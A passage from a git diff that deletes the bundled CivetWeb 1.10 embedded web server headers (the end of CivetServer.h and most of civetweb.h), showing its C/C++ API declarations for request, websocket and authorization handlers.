-	getParam(const std::string &data,
-	         const char *name,
-	         std::string &dst,
-	         size_t occurrence = 0)
-	{
-		return getParam(data.c_str(), data.length(), name, dst, occurrence);
-	}
-
-	/**
-	 * getParam(const char *, size_t, const char *, std::string &, size_t)
-	 *
-	 * Returns a query paramter contained in the supplied buffer.  The
-	 * occurance value is a zero-based index of a particular key name.  This
-	 * should not be confused with the index over all of the keys.
-	 *
-	 * @param data the - query string (text)
-	 * @param data_len - length of the query string
-	 * @param name - the key to search for
-	 * @param dst - the destination string
-	 * @param occurrence - the occurrence of the selected name in the query (0
-	 *based).
-	 * @return true if key was found
-	 */
-	static bool getParam(const char *data,
-	                     size_t data_len,
-	                     const char *name,
-	                     std::string &dst,
-	                     size_t occurrence = 0);
-
-	/**
-	 * urlDecode(const std::string &, std::string &, bool)
-	 *
-	 * @param src - string to be decoded
-	 * @param dst - destination string
-	 * @param is_form_url_encoded - true if form url encoded
-	 *       form-url-encoded data differs from URI encoding in a way that it
-	 *       uses '+' as character for space, see RFC 1866 section 8.2.1
-	 *       http://ftp.ics.uci.edu/pub/ietf/html/rfc1866.txt
-	 */
-	static void
-	urlDecode(const std::string &src,
-	          std::string &dst,
-	          bool is_form_url_encoded = true)
-	{
-		urlDecode(src.c_str(), src.length(), dst, is_form_url_encoded);
-	}
-
-	/**
-	 * urlDecode(const char *, size_t, std::string &, bool)
-	 *
-	 * @param src - buffer to be decoded
-	 * @param src_len - length of buffer to be decoded
-	 * @param dst - destination string
-	 * @param is_form_url_encoded - true if form url encoded
-	 *       form-url-encoded data differs from URI encoding in a way that it
-	 *       uses '+' as character for space, see RFC 1866 section 8.2.1
-	 *       http://ftp.ics.uci.edu/pub/ietf/html/rfc1866.txt
-	 */
-	static void urlDecode(const char *src,
-	                      size_t src_len,
-	                      std::string &dst,
-	                      bool is_form_url_encoded = true);
-
-	/**
-	 * urlDecode(const char *, std::string &, bool)
-	 *
-	 * @param src - buffer to be decoded (0 terminated)
-	 * @param dst - destination string
-	 * @param is_form_url_encoded true - if form url encoded
-	 *       form-url-encoded data differs from URI encoding in a way that it
-	 *       uses '+' as character for space, see RFC 1866 section 8.2.1
-	 *       http://ftp.ics.uci.edu/pub/ietf/html/rfc1866.txt
-	 */
-	static void urlDecode(const char *src,
-	                      std::string &dst,
-	                      bool is_form_url_encoded = true);
-
-	/**
-	 * urlEncode(const std::string &, std::string &, bool)
-	 *
-	 * @param src - buffer to be encoded
-	 * @param dst - destination string
-	 * @param append - true if string should not be cleared before encoding.
-	 */
-	static void
-	urlEncode(const std::string &src, std::string &dst, bool append = false)
-	{
-		urlEncode(src.c_str(), src.length(), dst, append);
-	}
-
-	/**
-	 * urlEncode(const char *, size_t, std::string &, bool)
-	 *
-	 * @param src - buffer to be encoded (0 terminated)
-	 * @param dst - destination string
-	 * @param append - true if string should not be cleared before encoding.
-	 */
-	static void
-	urlEncode(const char *src, std::string &dst, bool append = false);
-
-	/**
-	 * urlEncode(const char *, size_t, std::string &, bool)
-	 *
-	 * @param src - buffer to be encoded
-	 * @param src_len - length of buffer to be decoded
-	 * @param dst - destination string
-	 * @param append - true if string should not be cleared before encoding.
-	 */
-	static void urlEncode(const char *src,
-	                      size_t src_len,
-	                      std::string &dst,
-	                      bool append = false);
-
-	// generic user context which can be set/read,
-	// the server does nothing with this apart from keep it.
-	const void *
-	getUserContext() const
-	{
-		return UserContext;
-	}
-
-  protected:
-	class CivetConnection
-	{
-	  public:
-		char *postData;
-		unsigned long postDataLen;
-
-		CivetConnection();
-		~CivetConnection();
-	};
-
-	struct mg_context *context;
-	std::map<struct mg_connection *, class CivetConnection> connections;
-
-	// generic user context which can be set/read,
-	// the server does nothing with this apart from keep it.
-	const void *UserContext;
-
-  private:
-	/**
-	 * requestHandler(struct mg_connection *, void *cbdata)
-	 *
-	 * Handles the incomming request.
-	 *
-	 * @param conn - the connection information
-	 * @param cbdata - pointer to the CivetHandler instance.
-	 * @returns 0 if implemented, false otherwise
-	 */
-	static int requestHandler(struct mg_connection *conn, void *cbdata);
-
-	static int webSocketConnectionHandler(const struct mg_connection *conn,
-	                                      void *cbdata);
-	static void webSocketReadyHandler(struct mg_connection *conn, void *cbdata);
-	static int webSocketDataHandler(struct mg_connection *conn,
-	                                int bits,
-	                                char *data,
-	                                size_t data_len,
-	                                void *cbdata);
-	static void webSocketCloseHandler(const struct mg_connection *conn,
-	                                  void *cbdata);
-	/**
-	 * authHandler(struct mg_connection *, void *cbdata)
-	 *
-	 * Handles the authorization requests.
-	 *
-	 * @param conn - the connection information
-	 * @param cbdata - pointer to the CivetAuthHandler instance.
-	 * @returns 1 if authorized, 0 otherwise
-	 */
-	static int authHandler(struct mg_connection *conn, void *cbdata);
-
-	/**
-	 * closeHandler(struct mg_connection *)
-	 *
-	 * Handles closing a request (internal handler)
-	 *
-	 * @param conn - the connection information
-	 */
-	static void closeHandler(const struct mg_connection *conn);
-
-	/**
-	 * Stores the user provided close handler
-	 */
-	void (*userCloseHandler)(const struct mg_connection *conn);
-};
-
-#endif /*  __cplusplus */
-#endif /* _CIVETWEB_SERVER_H_ */
diff --git a/thirdparty/civetweb-1.10/include/civetweb.h b/thirdparty/civetweb-1.10/include/civetweb.h
deleted file mode 100644
index b0f5ee7..0000000
--- a/thirdparty/civetweb-1.10/include/civetweb.h
+++ /dev/null
@@ -1,1367 +0,0 @@
-/* Copyright (c) 2013-2017 the Civetweb developers
- * Copyright (c) 2004-2013 Sergey Lyubka
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-#ifndef CIVETWEB_HEADER_INCLUDED
-#define CIVETWEB_HEADER_INCLUDED
-
-#define CIVETWEB_VERSION "1.10"
-#define CIVETWEB_VERSION_MAJOR (1)
-#define CIVETWEB_VERSION_MINOR (10)
-#define CIVETWEB_VERSION_PATCH (0)
-#define CIVETWEB_VERSION_RELEASED
-
-#ifndef CIVETWEB_API
-#if defined(_WIN32)
-#if defined(CIVETWEB_DLL_EXPORTS)
-#define CIVETWEB_API __declspec(dllexport)
-#elif defined(CIVETWEB_DLL_IMPORTS)
-#define CIVETWEB_API __declspec(dllimport)
-#else
-#define CIVETWEB_API
-#endif
-#elif __GNUC__ >= 4
-#define CIVETWEB_API __attribute__((visibility("default")))
-#else
-#define CIVETWEB_API
-#endif
-#endif
-
-#include <stdio.h>
-#include <stddef.h>
-
-#ifdef __cplusplus
-extern "C" {
-#endif /* __cplusplus */
-
-
-/* Initialize this library. This should be called once before any other
- * function from this library. This function is not guaranteed to be
- * thread safe.
- * Parameters:
- *   features: bit mask for features to be initialized.
- * Return value:
- *   initialized features
- *   0: error
- */
-CIVETWEB_API unsigned mg_init_library(unsigned features);
-
-
-/* Un-initialize this library.
- * Return value:
- *   0: error
- */
-CIVETWEB_API unsigned mg_exit_library(void);
-
-
-struct mg_context;    /* Handle for the HTTP service itself */
-struct mg_connection; /* Handle for the individual connection */
-
-
-/* Maximum number of headers */
-#define MG_MAX_HEADERS (64)
-
-struct mg_header {
-	const char *name;  /* HTTP header name */
-	const char *value; /* HTTP header value */
-};
-
-
-/* This structure contains information about the HTTP request. */
-struct mg_request_info {
-	const char *request_method; /* "GET", "POST", etc */
-	const char *request_uri;    /* URL-decoded URI (absolute or relative,
-	                             * as in the request) */
-	const char *local_uri;      /* URL-decoded URI (relative). Can be NULL
-	                             * if the request_uri does not address a
-	                             * resource at the server host. */
-#if defined(MG_LEGACY_INTERFACE)
-	const char *uri; /* Deprecated: use local_uri instead */
-#endif
-	const char *http_version; /* E.g. "1.0", "1.1" */
-	const char *query_string; /* URL part after '?', not including '?', or
-	                             NULL */
-	const char *remote_user;  /* Authenticated user, or NULL if no auth
-	                             used */
-	char remote_addr[48];     /* Client's IP address as a string. */
-
-#if defined(MG_LEGACY_INTERFACE)
-	long remote_ip; /* Client's IP address. Deprecated: use remote_addr instead
-	                   */
-#endif
-
-	long long content_length; /* Length (in bytes) of the request body,
-	                             can be -1 if no length was given. */
-	int remote_port;          /* Client's port */
-	int is_ssl;               /* 1 if SSL-ed, 0 if not */
-	void *user_data;          /* User data pointer passed to mg_start() */
-	void *conn_data;          /* Connection-specific user data */
-
-	int num_headers; /* Number of HTTP headers */
-	struct mg_header
-	    http_headers[MG_MAX_HEADERS]; /* Allocate maximum headers */
-
-	struct mg_client_cert *client_cert; /* Client certificate information */
-
-	const char *acceptedWebSocketSubprotocol; /* websocket subprotocol,
-	                                           * accepted during handshake */
-};
-
-
-/* This structure contains information about the HTTP request. */
-/* This structure may be extended in future versions. */
-struct mg_response_info {
-	int status_code;          /* E.g. 200 */
-	const char *status_text;  /* E.g. "OK" */
-	const char *http_version; /* E.g. "1.0", "1.1" */
-
-	long long content_length; /* Length (in bytes) of the request body,
-	                             can be -1 if no length was given. */
-
-	int num_headers; /* Number of HTTP headers */
-	struct mg_header
-	    http_headers[MG_MAX_HEADERS]; /* Allocate maximum headers */
-};
-
-
-/* Client certificate information (part of mg_request_info) */
-/* New nomenclature. */
-struct mg_client_cert {
-	const char *subject;
-	const char *issuer;
-	const char *serial;
-	const char *finger;
-};
-
-/* Old nomenclature. */
-struct client_cert {
-	const char *subject;
-	const char *issuer;
-	const char *serial;
-	const char *finger;
-};
-
-
-/* This structure needs to be passed to mg_start(), to let civetweb know
-   which callbacks to invoke. For a detailed description, see
-   https://github.com/civetweb/civetweb/blob/master/docs/UserManual.md */
-struct mg_callbacks {
-	/* Called when civetweb has received new HTTP request.
-	   If the callback returns one, it must process the request
-	   by sending valid HTTP headers and a body. Civetweb will not do
-	   any further processing. Otherwise it must return zero.
-	   Note that since V1.7 the "begin_request" function is called
-	   before an authorization check. If an authorization check is
-	   required, use a request_handler instead.
-	   Return value:
-	     0: civetweb will process the request itself. In this case,
-	        the callback must not send any data to the client.
-	     1-999: callback already processed the request. Civetweb will
-	            not send any data after the callback returned. The
-	            return code is stored as a HTTP status code for the
-	            access log. */
-	int (*begin_request)(struct mg_connection *);
-
-	/* Called when civetweb has finished processing request. */
-	void (*end_request)(const struct mg_connection *, int reply_status_code);
-
-	/* Called when civetweb is about to log a message. If callback returns
-	   non-zero, civetweb does not log anything. */
-	int (*log_message)(const struct mg_connection *, const char *message);
-
-	/* Called when civetweb is about to log access. If callback returns
-	   non-zero, civetweb does not log anything. */
-	int (*log_access)(const struct mg_connection *, const char *message);
-
-	/* Called when civetweb initializes SSL library.
-	   Parameters:
-	     user_data: parameter user_data passed when starting the server.
-	   Return value:
-	     0: civetweb will set up the SSL certificate.
-	     1: civetweb assumes the callback already set up the certificate.
-	    -1: initializing ssl fails. */
-	int (*init_ssl)(void *ssl_context, void *user_data);
-
-#if defined(MG_LEGACY_INTERFACE)
-	/* Called when websocket request is received, before websocket handshake.
-	   Return value:
-	     0: civetweb proceeds with websocket handshake.
-	     1: connection is closed immediately.
-	   This callback is deprecated: Use mg_set_websocket_handler instead. */
-	int (*websocket_connect)(const struct mg_connection *);
-
-	/* Called when websocket handshake is successfully completed, and
-	   connection is ready for data exchange.
-	   This callback is deprecated: Use mg_set_websocket_handler instead. */
-	void (*websocket_ready)(struct mg_connection *);
-
-	/* Called when data frame has been received from the client.
-	   Parameters:
-	     bits: first byte of the websocket frame, see websocket RFC at
-	           http://tools.ietf.org/html/rfc6455, section 5.2
-	     data, data_len: payload, with mask (if any) already applied.
-	   Return value:
-	     1: keep this websocket connection open.
-	     0: close this websocket connection.
-	   This callback is deprecated: Use mg_set_websocket_handler instead. */
-	int (*websocket_data)(struct mg_connection *,
-	                      int bits,
-	                      char *data,
-	                      size_t data_len);
-#endif /* MG_LEGACY_INTERFACE */
-
-	/* Called when civetweb is closing a connection.  The per-context mutex is
-	   locked when this is invoked.
-
-	   Websockets:
-	   Before mg_set_websocket_handler has been added, it was primarily useful
-	   for noting when a websocket is closing, and used to remove it from any
-	   application-maintained list of clients.
-	   Using this callback for websocket connections is deprecated: Use
-	   mg_set_websocket_handler instead.
-
-	   Connection specific data:
-	   If memory has been allocated for the connection specific user data
-	   (mg_request_info->conn_data, mg_get_user_connection_data),
-	   this is the last chance to free it.
-	*/
-	void (*connection_close)(const struct mg_connection *);
-
-#if defined(MG_USE_OPEN_FILE)
-	/* Note: The "file in memory" feature is a deletion candidate, since
-	 * it complicates the code, and does not add any value compared to
-	 * "mg_add_request_handler".
-	 * See this discussion thread:
-	 * https://groups.google.com/forum/#!topic/civetweb/h9HT4CmeYqI
-	 * If you disagree, if there is any situation this is indeed useful
-	 * and cannot trivially be replaced by another existing feature,
-	 * please contribute to this discussion during the next 3 month
-	 * (till end of April 2017), otherwise this feature might be dropped
-	 * in future releases. */
-
-	/* Called when civetweb tries to open a file. Used to intercept file open
-	   calls, and serve file data from memory instead.
-	   Parameters:
-	      path:     Full path to the file to open.
-	      data_len: Placeholder for the file size, if file is served from
-	                memory.
-	   Return value:
-	     NULL: do not serve file from memory, proceed with normal file open.
-	     non-NULL: pointer to the file contents in memory. data_len must be
-	       initialized with the size of the memory block. */
-	const char *(*open_file)(const struct mg_connection *,
-	                         const char *path,
-	                         size_t *data_len);
-#endif
-
-	/* Called when civetweb is about to serve Lua server page, if
-	   Lua support is enabled.
-	   Parameters:
-	     lua_context: "lua_State *" pointer. */
-	void (*init_lua)(const struct mg_connection *, void *lua_context);
-
-#if defined(MG_LEGACY_INTERFACE)
-	/* Called when civetweb has uploaded a file to a temporary directory as a
-	   result of mg_upload() call.
-	   Note that mg_upload is deprecated. Use mg_handle_form_request instead.
-	   Parameters:
-	     file_name: full path name to the uploaded file. */
-	void (*upload)(struct mg_connection *, const char *file_name);
-#endif
-
-	/* Called when civetweb is about to send HTTP error to the client.
-	   Implementing this callback allows to create custom error pages.
-	   Parameters:
-	     status: HTTP error status code.
-	   Return value:
-	     1: run civetweb error handler.
-	     0: callback already handled the error. */
-	int (*http_error)(struct mg_connection *, int status);
-
-	/* Called after civetweb context has been created, before requests
-	   are processed.
-	   Parameters:
-	     ctx: context handle */
-	void (*init_context)(const struct mg_context *ctx);
-
-	/* Called when a new worker thread is initialized.
-	   Parameters:
-	     ctx: context handle
-	     thread_type:
-	       0 indicates the master thread
-	       1 indicates a worker thread handling client connections
-	       2 indicates an internal helper thread (timer thread)
-	       */
-	void (*init_thread)(const struct mg_context *ctx, int thread_type);
-
-	/* Called when civetweb context is deleted.
-	   Parameters:
-	     ctx: context handle */
-	void (*exit_context)(const struct mg_context *ctx);
-
-	/* Called when initializing a new connection object.
-	 * Can be used to initialize the connection specific user data
-	 * (mg_request_info->conn_data, mg_get_user_connection_data).
-	 * When the callback is called, it is not yet known if a
-	 * valid HTTP(S) request will be made.
-	 * Parameters:
-	 *   conn: not yet fully initialized connection object
-	 *   conn_data: output parameter, set to initialize the
-	 *              connection specific user data
-	 * Return value:
-	 *   must be 0
-	 *   Otherwise, the result is undefined
-	 */
-	int (*init_connection)(const struct mg_connection *conn, void **conn_data);
-};
-
-
-/* Start web server.
-
-   Parameters:
-     callbacks: mg_callbacks structure with user-defined callbacks.
-     options: NULL terminated list of option_name, option_value pairs that
-              specify Civetweb configuration parameters.
-
-   Side-effects: on UNIX, ignores SIGCHLD and SIGPIPE signals. If custom
-      processing is required for these, signal handlers must be set up
-      after calling mg_start().
-
-
-   Example:
-     const char *options[] = {
-       "document_root", "/var/www",
-       "listening_ports", "80,443s",
-       NULL
-     };
-     struct mg_context *ctx = mg_start(&my_func, NULL, options);
-
-   Refer to https://github.com/civetweb/civetweb/blob/master/docs/UserManual.md
-   for the list of valid option and their possible values.
-
-   Return:
-     web server context, or NULL on error. */
-CIVETWEB_API struct mg_context *mg_start(const struct mg_callbacks *callbacks,
-                                         void *user_data,
-                                         const char **configuration_options);
-
-
-/* Stop the web server.
-
-   Must be called last, when an application wants to stop the web server and
-   release all associated resources. This function blocks until all Civetweb
-   threads are stopped. Context pointer becomes invalid. */
-CIVETWEB_API void mg_stop(struct mg_context *);
-
-
-/* mg_request_handler
-
-   Called when a new request comes in.  This callback is URI based
-   and configured with mg_set_request_handler().
-
-   Parameters:
-      conn: current connection information.
-      cbdata: the callback data configured with mg_set_request_handler().
-   Returns:
-      0: the handler could not handle the request, so fall through.
-      1 - 999: the handler processed the request. The return code is
-               stored as a HTTP status code for the access log. */
-typedef int (*mg_request_handler)(struct mg_connection *conn, void *cbdata);
-
-
-/* mg_set_request_handler
-
-   Sets or removes a URI mapping for a request handler.
-   This function uses mg_lock_context internally.
-
-   URI's are ordered and prefixed URI's are supported. For example,
-   consider two URIs: /a/b and /a
-           /a   matches /a
-           /a/b matches /a/b
-           /a/c matches /a
-
-   Parameters:
-      ctx: server context
-      uri: the URI (exact or pattern) for the handler
-      handler: the callback handler to use when the URI is requested.
-               If NULL, an already registered handler for this URI will
-               be removed.
-               The URI used to remove a handler must match exactly the
-               one used to register it (not only a pattern match).
-      cbdata: the callback data to give to the handler when it is called. */
-CIVETWEB_API void mg_set_request_handler(struct mg_context *ctx,
-                                         const char *uri,
-                                         mg_request_handler handler,
-                                         void *cbdata);
-
-
-/* Callback types for websocket handlers in C/C++.
-
-   mg_websocket_connect_handler
-       Is called when the client intends to establish a websocket connection,
-       before websocket handshake.
-       Return value:
-         0: civetweb proceeds with websocket handshake.
-         1: connection is closed immediately.
-
-   mg_websocket_ready_handler
-       Is called when websocket handshake is successfully completed, and
-       connection is ready for data exchange.
-
-   mg_websocket_data_handler
-       Is called when a data frame has been received from the client.
-       Parameters:
-         bits: first byte of the websocket frame, see websocket RFC at
-               http://tools.ietf.org/html/rfc6455, section 5.2
-         data, data_len: payload, with mask (if any) already applied.
-       Return value:
-         1: keep this websocket connection open.
-         0: close this websocket connection.
-
-   mg_connection_close_handler
-       Is called, when the connection is closed.*/
-typedef int (*mg_websocket_connect_handler)(const struct mg_connection *,
-                                            void *);
-typedef void (*mg_websocket_ready_handler)(struct mg_connection *, void *);
-typedef int (*mg_websocket_data_handler)(struct mg_connection *,
-                                         int,
-                                         char *,
-                                         size_t,
-                                         void *);
-typedef void (*mg_websocket_close_handler)(const struct mg_connection *,
-                                           void *);
-
-/* struct mg_websocket_subprotocols
- *
- * List of accepted subprotocols
- */
-struct mg_websocket_subprotocols {
-	int nb_subprotocols;
-	char **subprotocols;
-};
-
-/* mg_set_websocket_handler
-
-   Set or remove handler functions for websocket connections.
-   This function works similar to mg_set_request_handler - see there. */
-CIVETWEB_API void
-mg_set_websocket_handler(struct mg_context *ctx,
-                         const char *uri,
-                         mg_websocket_connect_handler connect_handler,
-                         mg_websocket_ready_handler ready_handler,
-                         mg_websocket_data_handler data_handler,
-                         mg_websocket_close_handler close_handler,
-                         void *cbdata);
-
-/* mg_set_websocket_handler
-
-   Set or remove handler functions for websocket connections.
-   This function works similar to mg_set_request_handler - see there. */
-CIVETWEB_API void mg_set_websocket_handler_with_subprotocols(
-    struct mg_context *ctx,
-    const char *uri,
-    struct mg_websocket_subprotocols *subprotocols,
-    mg_websocket_connect_handler connect_handler,
-    mg_websocket_ready_handler ready_handler,
-    mg_websocket_data_handler data_handler,
-    mg_websocket_close_handler close_handler,
-    void *cbdata);
-
-
-/* mg_authorization_handler
-
-   Callback function definition for mg_set_auth_handler
-
-   Parameters:
-      conn: current connection information.
-      cbdata: the callback data configured with mg_set_request_handler().
-   Returns:
-      0: access denied
-      1: access granted
- */
-typedef int (*mg_authorization_handler)(struct mg_connection *conn,
-                                        void *cbdata);
-
-
-/* mg_set_auth_handler
-
-   Sets or removes a URI mapping for an authorization handler.
-   This function works similar to mg_set_request_handler - see there. */
-CIVETWEB_API void mg_set_auth_handler(struct mg_context *ctx,
-                                      const char *uri,
-                                      mg_authorization_handler handler,
-                                      void *cbdata);
-
-
-/* Get the value of particular configuration parameter.
-   The value returned is read-only. Civetweb does not allow changing
-   configuration at run time.
-   If given parameter name is not valid, NULL is returned. For valid
-   names, return value is guaranteed to be non-NULL. If parameter is not
-   set, zero-length string is returned. */
-CIVETWEB_API const char *mg_get_option(const struct mg_context *ctx,
-                                       const char *name);
-
-
-/* Get context from connection. */
-CIVETWEB_API struct mg_context *
-mg_get_context(const struct mg_connection *conn);
-
-
-/* Get user data passed to mg_start from context. */
-CIVETWEB_API void *mg_get_user_data(const struct mg_context *ctx);
-
-
-/* Set user data for the current connection. */
-CIVETWEB_API void mg_set_user_connection_data(struct mg_connection *conn,
-                                              void *data);
-
-
-/* Get user data set for the current connection. */
-CIVETWEB_API void *
-mg_get_user_connection_data(const struct mg_connection *conn);
-
-
-/* Get a formatted link corresponding to the current request
-
-   Parameters:
-      conn: current connection information.
-      buf: string buffer (out)
-      buflen: length of the string buffer
-   Returns:
-      <0: error
-      >=0: ok */
-CIVETWEB_API int
-mg_get_request_link(const struct mg_connection *conn, char *buf, size_t buflen);
-
-
-#if defined(MG_LEGACY_INTERFACE)
-/* Return array of strings that represent valid configuration options.
-   For each option, option name and default value is returned, i.e. the
-   number of entries in the array equals to number_of_options x 2.
-   Array is NULL terminated. */
-/* Deprecated: Use mg_get_valid_options instead. */
-CIVETWEB_API const char **mg_get_valid_option_names(void);
-#endif
-
-
-struct mg_option {
-	const char *name;
-	int type;
-	const char *default_value;
-};
-
-/* Old nomenclature */
-enum {
-	CONFIG_TYPE_UNKNOWN = 0x0,
-	CONFIG_TYPE_NUMBER = 0x1,
-	CONFIG_TYPE_STRING = 0x2,
-	CONFIG_TYPE_FILE = 0x3,
-	CONFIG_TYPE_DIRECTORY = 0x4,
-	CONFIG_TYPE_BOOLEAN = 0x5,
-	CONFIG_TYPE_EXT_PATTERN = 0x6,
-	CONFIG_TYPE_STRING_LIST = 0x7,
-	CONFIG_TYPE_STRING_MULTILINE = 0x8
-};
-
-/* New nomenclature */
-enum {
-	MG_CONFIG_TYPE_UNKNOWN = 0x0,
-	MG_CONFIG_TYPE_NUMBER = 0x1,
-	MG_CONFIG_TYPE_STRING = 0x2,
-	MG_CONFIG_TYPE_FILE = 0x3,
-	MG_CONFIG_TYPE_DIRECTORY = 0x4,
-	MG_CONFIG_TYPE_BOOLEAN = 0x5,
-	MG_CONFIG_TYPE_EXT_PATTERN = 0x6,
-	MG_CONFIG_TYPE_STRING_LIST = 0x7,
-	MG_CONFIG_TYPE_STRING_MULTILINE = 0x8
-};
-
-/* Return array of struct mg_option, representing all valid configuration
-   options of civetweb.c.
-   The array is terminated by a NULL name option. */
-CIVETWEB_API const struct mg_option *mg_get_valid_options(void);
-
-
-struct mg_server_ports {
-	int protocol;    /* 1 = IPv4, 2 = IPv6, 3 = both */
-	int port;        /* port number */
-	int is_ssl;      /* https port: 0 = no, 1 = yes */
-	int is_redirect; /* redirect all requests: 0 = no, 1 = yes */
-	int _reserved1;
-	int _reserved2;
-	int _reserved3;
-	int _reserved4;
-};
-
-
-/* Get the list of ports that civetweb is listening on.
-   The parameter size is the size of the ports array in elements.
-   The caller is responsibility to allocate the required memory.
-   This function returns the number of struct mg_server_ports elements
-   filled in, or <0 in case of an error. */
-CIVETWEB_API int mg_get_server_ports(const struct mg_context *ctx,
-                                     int size,
-                                     struct mg_server_ports *ports);
-
-
-#if defined(MG_LEGACY_INTERFACE)
-/* Deprecated: Use mg_get_server_ports instead. */
-CIVETWEB_API size_t
-mg_get_ports(const struct mg_context *ctx, size_t size, int *ports, int *ssl);
-#endif
-
-
-/* Add, edit or delete the entry in the passwords file.
- *
- * This function allows an application to manipulate .htpasswd files on the
- * fly by adding, deleting and changing user records. This is one of the
- * several ways of implementing authentication on the server side. For another,
- * cookie-based way please refer to the examples/chat in the source tree.
- *
- * Parameter:
- *   passwords_file_name: Path and name of a file storing multiple passwords
- *   realm: HTTP authentication realm (authentication domain) name
- *   user: User name
- *   password:
- *     If password is not NULL, entry modified or added.
- *     If password is NULL, entry is deleted.
- *
- *  Return:
- *    1 on success, 0 on error.
- */
-CIVETWEB_API int mg_modify_passwords_file(const char *passwords_file_name,
-                                          const char *realm,
-                                          const char *user,
-                                          const char *password);
-
-
-/* Return information associated with the request.
- * Use this function to implement a server and get data about a request
- * from a HTTP/HTTPS client.
- * Note: Before CivetWeb 1.10, this function could be used to read
- * a response from a server, when implementing a client, although the
- * values were never returned in appropriate mg_request_info elements.
- * It is strongly advised to use mg_get_response_info for clients.
- */
-CIVETWEB_API const struct mg_request_info *
-mg_get_request_info(const struct mg_connection *);
-
-
-/* Return information associated with a HTTP/HTTPS response.
- * Use this function in a client, to check the response from
- * the server. */
-CIVETWEB_API const struct mg_response_info *
-mg_get_response_info(const struct mg_connection *);
-
-
-/* Send data to the client.
-   Return:
-    0   when the connection has been closed
-    -1  on error
-    >0  number of bytes written on success */
-CIVETWEB_API int mg_write(struct mg_connection *, const void *buf, size_t len);
-
-
-/* Send data to a websocket client wrapped in a websocket frame.  Uses
-   mg_lock_connection to ensure that the transmission is not interrupted,
-   i.e., when the application is proactively communicating and responding to
-   a request simultaneously.
-
-   Send data to a websocket client wrapped in a websocket frame.
-   This function is available when civetweb is compiled with -DUSE_WEBSOCKET
-
-   Return:
-    0   when the connection has been closed
-    -1  on error
-    >0  number of bytes written on success */
-CIVETWEB_API int mg_websocket_write(struct mg_connection *conn,
-                                    int opcode,
-                                    const char *data,
-                                    size_t data_len);
-
-
-/* Send data to a websocket server wrapped in a masked websocket frame.  Uses
-   mg_lock_connection to ensure that the transmission is not interrupted,
-   i.e., when the application is proactively communicating and responding to
-   a request simultaneously.
-
-   Send data to a websocket server wrapped in a masked websocket frame.
-   This function is available when civetweb is compiled with -DUSE_WEBSOCKET
-
-   Return:
-    0   when the connection has been closed
-    -1  on error
-    >0  number of bytes written on success */
-CIVETWEB_API int mg_websocket_client_write(struct mg_connection *conn,
-                                           int opcode,
-                                           const char *data,
-                                           size_t data_len);
-
-
-/* Blocks until unique access is obtained to this connection. Intended for use
-   with websockets only.
-   Invoke this before mg_write or mg_printf when communicating with a
-   websocket if your code has server-initiated communication as well as
-   communication in direct response to a message. */
-CIVETWEB_API void mg_lock_connection(struct mg_connection *conn);
-CIVETWEB_API void mg_unlock_connection(struct mg_connection *conn);
-
-
-#if defined(MG_LEGACY_INTERFACE)
-#define mg_lock mg_lock_connection
-#define mg_unlock mg_unlock_connection
-#endif
-
-
-/* Lock server context.  This lock may be used to protect resources
-   that are shared between different connection/worker threads. */
-CIVETWEB_API void mg_lock_context(struct mg_context *ctx);
-CIVETWEB_API void mg_unlock_context(struct mg_context *ctx);
-
-
-/* Opcodes, from http://tools.ietf.org/html/rfc6455 */
-/* Old nomenclature */
-enum {
-	WEBSOCKET_OPCODE_CONTINUATION = 0x0,
-	WEBSOCKET_OPCODE_TEXT = 0x1,
-	WEBSOCKET_OPCODE_BINARY = 0x2,
-	WEBSOCKET_OPCODE_CONNECTION_CLOSE = 0x8,
-	WEBSOCKET_OPCODE_PING = 0x9,
-	WEBSOCKET_OPCODE_PONG = 0xa
-};
-
-/* New nomenclature */
-enum {
-	MG_WEBSOCKET_OPCODE_CONTINUATION = 0x0,
-	MG_WEBSOCKET_OPCODE_TEXT = 0x1,
-	MG_WEBSOCKET_OPCODE_BINARY = 0x2,
-	MG_WEBSOCKET_OPCODE_CONNECTION_CLOSE = 0x8,
-	MG_WEBSOCKET_OPCODE_PING = 0x9,
-	MG_WEBSOCKET_OPCODE_PONG = 0xa
-};
-
-/* Macros for enabling compiler-specific checks for printf-like arguments. */
-#undef PRINTF_FORMAT_STRING
-#if defined(_MSC_VER) && _MSC_VER >= 1400
-#include <sal.h>
-#if defined(_MSC_VER) && _MSC_VER > 1400
-#define PRINTF_FORMAT_STRING(s) _Printf_format_string_ s
-#else
-#define PRINTF_FORMAT_STRING(s) __format_string s
-#endif
-#else
-#define PRINTF_FORMAT_STRING(s) s
-#endif
-
-#ifdef __GNUC__
-#define PRINTF_ARGS(x, y) __attribute__((format(printf, x, y)))
-#else
-#define PRINTF_ARGS(x, y)
-#endif
-
-
-/* Send data to the client using printf() semantics.
-   Works exactly like mg_write(), but allows to do message formatting. */
-CIVETWEB_API int mg_printf(struct mg_connection *,
-                           PRINTF_FORMAT_STRING(const char *fmt),
-                           ...) PRINTF_ARGS(2, 3);
-
-
-/* Send a part of the message body, if chunked transfer encoding is set.
- * Only use this function after sending a complete HTTP request or response
- * header with "Transfer-Encoding: chunked" set. */
-CIVETWEB_API int mg_send_chunk(struct mg_connection *conn,
-                               const char *chunk,
-                               unsigned int chunk_len);
-
-
-/* Send contents of the entire file together with HTTP headers. */
-CIVETWEB_API void mg_send_file(struct mg_connection *conn, const char *path);
-
-
-/* Send HTTP error reply. */
-CIVETWEB_API void mg_send_http_error(struct mg_connection *conn,
-                                     int status_code,
-                                     PRINTF_FORMAT_STRING(const char *fmt),
-                                     ...) PRINTF_ARGS(3, 4);
-
-
-/* Send HTTP digest access authentication request.
- * Browsers will send a user name and password in their next request, showing
- * an authentication dialog if the password is not stored.
